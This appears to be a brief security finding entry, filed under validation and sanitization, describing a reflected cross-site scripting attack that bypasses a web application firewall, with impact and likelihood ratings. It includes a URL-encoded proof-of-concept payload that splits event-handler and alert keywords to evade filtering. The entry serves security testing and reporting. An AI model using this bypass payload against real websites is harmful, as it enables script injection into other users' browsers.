V5 - Validation/Sanitization
Reflected XSS - WAF bypass
POC
Observe the payloads that are blocked by WAF and try one similar to the following: https://targetsite/?&q&zzz%27onmou%3Cseover=1&ale%3Crt(%27xsp%27%3C)%3C%3B1%3B%20// Note: This is a broad concept, above payload is just an example
Impact
Low-Medium
Likelihood
Low-Medium